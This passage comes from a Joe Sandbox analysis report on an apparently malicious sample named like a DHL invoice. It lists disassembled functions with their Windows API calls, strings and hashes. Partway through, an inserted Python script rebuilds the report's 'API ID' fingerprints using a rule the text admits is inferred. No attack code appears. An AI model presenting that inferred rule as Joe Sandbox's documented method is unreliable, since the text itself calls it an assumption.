                                                                                                                        • Instruction Fuzzy Hash: 3F419434A00209DBCF16DF68C845E9FBBF5BF46366F158155EC24AB362D731AA09CB90
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0038F3AB,00000000,?,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 003C824C
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 003C8272
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003C82D1
                                                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 003C82E5
                                                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 003C830B
                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003C832F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 642888154-2513823414
                                                                                                                        • Opcode ID: c29b87169cb2cef1ae14100d2324e8fd691b3270df35eb1b35bf0a4952933788
                                                                                                                        • Instruction ID: 85361f9034726c9eead3bd9465f2abb9acb70f645d4db18a0717f1bea566d4ad
                                                                                                                        • Opcode Fuzzy Hash: c29b87169cb2cef1ae14100d2324e8fd691b3270df35eb1b35bf0a4952933788
                                                                                                                        • Instruction Fuzzy Hash: FA418E78601644AFDB22CF15C999FA47BF0FB0A714F1952ADE508DB2B2CB32AD41CB54
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0039C913
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoad
                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                        • Opcode ID: b9faec9c173ab57c1955b909a7c29104882f85e2a8b33c7e3224c5a068fa0319
                                                                                                                        • Instruction ID: dd97bf855fd3eb458460b9adbc45feab16707e2b8921f62b1916931b31f15dd6
                                                                                                                        • Opcode Fuzzy Hash: b9faec9c173ab57c1955b909a7c29104882f85e2a8b33c7e3224c5a068fa0319
                                                                                                                        • Instruction Fuzzy Hash: D6110D3169D30ABAEF076B549C83CEB779CDF15359B21102AF904A6192D7706D445364
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 952045576-0
                                                                                                                        • Opcode ID: 4b617a2600b6f1758d0505ee2f38c7528731c3987b62f97d81b1c69dfeacc731
                                                                                                                        • Instruction ID: 354658e010cf9b9ddf364570575040eca64697fd6ba7675e3a6347afc7f3108a
                                                                                                                        • Opcode Fuzzy Hash: 4b617a2600b6f1758d0505ee2f38c7528731c3987b62f97d81b1c69dfeacc731
                                                                                                                        • Instruction Fuzzy Hash: E5418065C1021875CB12EBB4888BDDFB7B8AF45711F508866E918E7132FB34E259C3E5
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0034F953
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0038F3D1
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0038F454
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 48b2b04d575b2fccf4cd6748d51597ebe0122daf4a2d7f723da7ba817db42526
                                                                                                                        • Instruction ID: fe02a9a0c272762e68d89e9b64c303a04cba782f9e97d67dde06c86838a58c48
                                                                                                                        • Opcode Fuzzy Hash: 48b2b04d575b2fccf4cd6748d51597ebe0122daf4a2d7f723da7ba817db42526
                                                                                                                        • Instruction Fuzzy Hash: FC41D931618740BED7379F298988B2A7BD5AB56314F1D443DE0479F970C771B980C711
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 003C2D1B
                                                                                                                        • GetDC.USER32(00000000), ref: 003C2D23
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003C2D2E
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 003C2D3A
                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003C2D76
                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003C2D87
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 003C2DC2
                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003C2DE1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3864802216-0
                                                                                                                        • Opcode ID: c6395a60523ca25258029fc719969b66b5d7128e5ad041c7cd0f10ff3878dbfd
                                                                                                                        • Instruction ID: 076895cf6918434b9e03ea59e2a23f55b5c060add4db5a2b1b10225b210eeab1
                                                                                                                        • Opcode Fuzzy Hash: c6395a60523ca25258029fc719969b66b5d7128e5ad041c7cd0f10ff3878dbfd
                                                                                                                        • Instruction Fuzzy Hash: BA319C72211214BFEB128F50CC8AFEB3BADEF19711F084055FE09DA291C675AC51CBA0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2931989736-0
                                                                                                                        • Opcode ID: 67b466794834f65e3f414b44121b391586d1d8d2487cf351a28d8e7438f5d26a
                                                                                                                        • Instruction ID: 725f5b10d6513255fce0f7b741ef83a92355ca1906c1a7e14e25c278beccfd2e
                                                                                                                        • Opcode Fuzzy Hash: 67b466794834f65e3f414b44121b391586d1d8d2487cf351a28d8e7438f5d26a
                                                                                                                        • Instruction Fuzzy Hash: 8721DB66741A097BDA175E209D92FFB335DAF20385F444034FD04DEA81F720EE5483A5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                        • API String ID: 0-572801152
                                                                                                                        • Opcode ID: 57cc58aade470db893244a7b11d990a05837adae424ba82c713b0387af437440
                                                                                                                        • Instruction ID: 0cefa0c9726128e1cc8c5ef9cd7c7dbbc8abd8f0656588efd3c1a81a48dc3d79
                                                                                                                        • Opcode Fuzzy Hash: 57cc58aade470db893244a7b11d990a05837adae424ba82c713b0387af437440
                                                                                                                        • Instruction Fuzzy Hash: A5D1D075A0060A9FDF12DFA8C880FEEB7B5BF48348F158069EA15AB680D770DD41CB90
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,003717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 003715CE
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00371651
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,003717FB,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003716E4
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003716FB
                                                                                                                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00371777
                                                                                                                        • __freea.LIBCMT ref: 003717A2
                                                                                                                        • __freea.LIBCMT ref: 003717AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2829977744-0
                                                                                                                        • Opcode ID: 00b2636993de815f8edfcb20ee78838f84da1d89983d35e12a869fbe2a3607f1
                                                                                                                        • Instruction ID: 4d5683c9a4314e790555b88daafe4319bccec91cf055dd8ceddf00bda716c8ba
                                                                                                                        • Opcode Fuzzy Hash: 00b2636993de815f8edfcb20ee78838f84da1d89983d35e12a869fbe2a3607f1
                                                                                                                        • Instruction Fuzzy Hash: 2A91D573E102469ADB3A8E6CC881EEE7BB9AF45710F198519E809E7140D739DC44CBA0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                        • Opcode ID: 0b9f31d392e77b36d9d5c32c9cb4c37d5bea57d3d06597ba9062e7f3ef9bb2eb
                                                                                                                        • Instruction ID: 75a60b4187353414c85a56d600e567e855b1a72abac8051e818c3f2782f776f6
                                                                                                                        • Opcode Fuzzy Hash: 0b9f31d392e77b36d9d5c32c9cb4c37d5bea57d3d06597ba9062e7f3ef9bb2eb
                                                                                                                        • Instruction Fuzzy Hash: C191C570A00219AFCF22CFA5C845FEEB7B8EF46714F108559F615AB682DB709941CFA4
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 003A125C
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 003A1284
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 003A12A8
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A12D8
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A135F
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A13C4
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A1430
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2550207440-0
                                                                                                                        • Opcode ID: 4eb5823ceb68e240330a77df1e37e1b8a929e389fa9fd5acd040d300c152914b
                                                                                                                        • Instruction ID: cb9bbc8e52674bb705b8ac1a48ce8e9abe9241c3b68b4d0dcf841ae786a1fbf9
                                                                                                                        • Opcode Fuzzy Hash: 4eb5823ceb68e240330a77df1e37e1b8a929e389fa9fd5acd040d300c152914b
                                                                                                                        • Instruction Fuzzy Hash: 28913475A00208AFDB07DF99C884BBEB7B9FF06321F118429E941EB291D774E941CB90
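                                                                                                                         The "API ID" line of each entry above can be rebuilt from the entry's listed API calls, which makes it possible to compute the same fingerprint for a function taken from your own disassembly and look for it in the report. The Python below is an added example, not code from the Joe Sandbox report or from Joe Security's tooling. The derivation rule it implements is inferred from the entries on this page and is an assumption: split each API name on CamelCase boundaries, drop tokens shorter than four characters and all-uppercase tokens (the Get/Rtl/Co/Mem prefixes, the W/A/Ex suffixes, CP, ID, CLSID), count tokens across direct calls and "Part of subcall" lines alike, then emit the tokens grouped by descending count, ASCII-sorted inside a group, with "$" between groups. The two input strings are constructed by copying the API lines of the MultiByteToWideChar entry (ref 003715CE..003717AE) and the SafeArray entry (ref 003A125C..003A1430) from this report.

```python
"""Rebuild a Joe Sandbox function entry's "API ID" from its listed API calls.

Added example, not part of the report or of Joe Sandbox's own tooling. The rule
below is inferred from the entries on this page and is an assumption:
  1. split each API name on CamelCase boundaries;
  2. drop tokens shorter than four characters and all-uppercase tokens
     (Get/Rtl/Co/Mem prefixes, W/A/Ex suffixes, CP, ID, CLSID);
  3. count tokens across every listed call, "Part of subcall" lines included;
  4. emit groups in descending count, ASCII-sorted inside a group, joined by "$".
"""
import re
from collections import Counter
from itertools import groupby

# Constructed input: the API lines of two entries on this report, copied verbatim.
ENTRY_MBTWC = """\
• GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,003717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 003715CE
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00371651
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,003717FB,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003716E4
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003716FB
  • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00371777
• __freea.LIBCMT ref: 003717A2
• __freea.LIBCMT ref: 003717AE
"""
ENTRY_SAFEARRAY = """\
• SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 003A125C
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 003A1284
• SafeArrayUnaccessData.OLEAUT32(00000001), ref: 003A12A8
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A12D8
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A135F
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A13C4
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A1430
"""

# One API line: optional "Part of subcall function <addr>: " prefix, Name.MODULE,
# optional "(args)," and finally "ref: <addr>" (the call site inside the function).
_API_LINE = re.compile(
    r"(?:Part of subcall function (?P<caller>[0-9A-F]{8,16}): )?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z][A-Z0-9_]*)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref: (?P<ref>[0-9A-F]{8,16})"
)
# CamelCase splitter: an uppercase run not followed by lowercase (CP, ID, W), a
# capitalised word, or a lowercase/underscore run (__freea, _wcslen, lstrcmpi).
_CAMEL = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z]+|[a-z_]+")


def parse_api_lines(text):
    """One dict per API line: name, module, ref, caller (subcall parent) and args."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.search(line)
        if not m:
            continue  # section headers, empty lines, anything that is not a call
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "ref": m.group("ref"),
            "caller": m.group("caller"),  # None for a direct call
            "args": m.group("args").split(",") if m.group("args") else [],
        })
    return calls


def tokenize(api_name):
    """CamelCase tokens of an API name, minus short and all-uppercase pieces."""
    return [t for t in _CAMEL.findall(api_name) if len(t) >= 4 and not t.isupper()]


def api_id(api_names):
    """Group tokens by descending frequency; ASCII order inside a group; '$' between."""
    counts = Counter(tok for name in api_names for tok in tokenize(name))
    ordered = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return "$".join(
        "".join(tok for tok, _ in grp)
        for _, grp in groupby(ordered, key=lambda kv: kv[1])
    )


def entry_api_id(entry_text):
    """API ID for one function entry's API section (direct and subcall lines)."""
    return api_id(c["name"] for c in parse_api_lines(entry_text))


if __name__ == "__main__":
    for label, entry in (("MultiByteToWideChar", ENTRY_MBTWC), ("SafeArray", ENTRY_SAFEARRAY)):
        print(f"{label}: {entry_api_id(entry)}")
```

                                                                                                                         Run as-is it reproduces "ByteCharMultiWide$__freea$AllocateHeapInfo" and "ArraySafe$Data$Access$UnaccessVartype" exactly as printed on this page; the same rule also reproduces the ObjCreate and menu-walking entries further down. The numeric "API String ID" that follows each API ID is a hash whose algorithm this report does not disclose, so the script does not attempt it.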
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3225163088-0
                                                                                                                        • Opcode ID: 193bfafaed8713ac8f1af2c483efbb12d8cba41b7347e996c4d6ea3286bc1c78
                                                                                                                        • Instruction ID: 797007579a0e28533807adc3e9f975ca7893f8858cc9af3b6328c6f1ede3e4a7
                                                                                                                        • Opcode Fuzzy Hash: 193bfafaed8713ac8f1af2c483efbb12d8cba41b7347e996c4d6ea3286bc1c78
                                                                                                                        • Instruction Fuzzy Hash: 1B913A71D00219EFCB12CFA9CC84AEEBBB9FF49320F25459AE515BB251D374A941CB60
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 003B396B
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003B3A7A
                                                                                                                        • _wcslen.LIBCMT ref: 003B3A8A
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 003B3C1F
                                                                                                                          • Part of subcall function 003A0CDF: VariantInit.OLEAUT32(00000000), ref: 003A0D1F
                                                                                                                          • Part of subcall function 003A0CDF: VariantCopy.OLEAUT32(?,?), ref: 003A0D28
                                                                                                                          • Part of subcall function 003A0CDF: VariantClear.OLEAUT32(?), ref: 003A0D34
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                        • API String ID: 4137639002-1221869570
                                                                                                                        • Opcode ID: 8746c0601a3a4665a068d7ae02ad4c6d84a5cdcb46ec15d11f38d37865dcd34b
                                                                                                                        • Instruction ID: 0df644045c66102540d143ff37577256178a5dce3525cc45c5e98cb80bb3884e
                                                                                                                        • Opcode Fuzzy Hash: 8746c0601a3a4665a068d7ae02ad4c6d84a5cdcb46ec15d11f38d37865dcd34b
                                                                                                                        • Instruction Fuzzy Hash: E4919B756083059FCB05DF28C4819AAB7E4FF89318F14882DF98A9B751DB30EE05CB82
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0039000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?,?,0039035E), ref: 0039002B
                                                                                                                          • Part of subcall function 0039000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390046
                                                                                                                          • Part of subcall function 0039000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390054
                                                                                                                          • Part of subcall function 0039000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?), ref: 00390064
                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 003B4C51
                                                                                                                        • _wcslen.LIBCMT ref: 003B4D59
                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 003B4DCF
                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 003B4DDA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
